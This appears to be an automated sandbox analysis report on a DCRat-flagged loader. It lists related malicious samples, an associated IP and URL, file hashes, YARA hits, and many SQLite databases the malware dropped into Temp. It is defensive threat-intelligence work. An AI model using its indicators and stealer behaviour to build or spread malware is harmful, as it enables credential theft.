	NEW ORDER.docx.doc	Get hash	malicious	Unknown	Browse	104.21.90.18
	https://bcr.serviciul.com/	Get hash	malicious	Unknown	Browse	104.21.90.18
	setup.exe	Get hash	malicious	LummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLine	Browse	104.21.90.18
	SecuriteInfo.com.Script.SNH-gen.23298.6936.xlsx	Get hash	malicious	Unknown	Browse	104.21.90.18

Process:	C:\Users\user\AppData\Local\Temp\Loader\572stuOQ0pZG2Xj.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1848832
Entropy (8bit):	4.5784850862937665
Encrypted:	false
SSDEEP:	24576:B521pJhV0x6LrySNYWaJTHbkA+mfQWLNfXyAHNd5CqF0AqT2:nApfcnzdbkZ5Y3d5Co
MD5:	93E99FB34AC2CD9D6E867E24DCAFB2AB
SHA1:	C6EE148ABC972494C2912E68534512160372F4A6
SHA-256:	8CF7A779191A6B146749DE10A52303201D4C72621F04D1336D51F400256D662E
SHA-512:	65ADE8226509BDF7B160F04BC6CBB12C790C7A960DDEE6776AA0E6094246062F323A80DD2D858A49AAFEF5CC5DB2ADE00A8A42D939FF3571029172AA7D34D877
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\ProgramData\SoftwareDistribution\Bypass.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\ProgramData\SoftwareDistribution\Bypass.exe, Author: Joe Security Rule: MALWARE_Win_DCRat, Description: DCRat payload, Source: C:\ProgramData\SoftwareDistribution\Bypass.exe, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.........."..................L... ...`....@.. ..............................ZJ....@..................................L..W....`............................................................................... ............... ..H............text....,... ...................... ..`.rsrc........`.......0..............@..@.reloc...............4..............@..B.................L......H.......H...LG..........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:Nlllullkv/tz:NllU+v/
MD5:	6442F277E58B3984BA5EEE0C15C0C6AD
SHA1:	5343ADC2E7F102EC8FB6A101508730898CB14F57
SHA-256:	36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
SHA-512:	F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\050YBm5Nq0

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\0sKXUvZT9v

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\0ueUesFUQH

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\14WeqpTX45

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5707520969659783
Encrypted:	false
SSDEEP:	12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	9F6D153D934BCC50E8BC57E7014B201A
SHA1:	50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
SHA-256:	2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
SHA-512:	B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
Malicious:	false
Preview:	SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1bwHy2zxr4

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\1jvHOAabKq

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\2FymvUtus3

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\2UYiReUaoa

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\32dIHFaXpQ

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\38Y7YT1xWA

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\3TtieY1LVM

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\3blATA5LGl

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4FYvL991U0

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4VLz2PivYy

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\4bnIwHs21a

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\5NRxPDUg7Q

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\5cou29tUgX

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\6AROTc7Y9L

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\6apLsw2rGZ

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\6ikI1fqZKE

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.5712781801655107
Encrypted:	false
SSDEEP:	12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
MD5:	05A60B4620923FD5D53B9204391452AF
SHA1:	DC12F90925033F25C70A720E01D5F8666D0B46E4
SHA-256:	6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
SHA-512:	068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\6jjMwXw5vH

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8AOKsu2UlM

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8FKK3Euvy5

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\8Wwiformvu

Download File

Process:	C:\ProgramData\SoftwareDistribution\Bypass.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
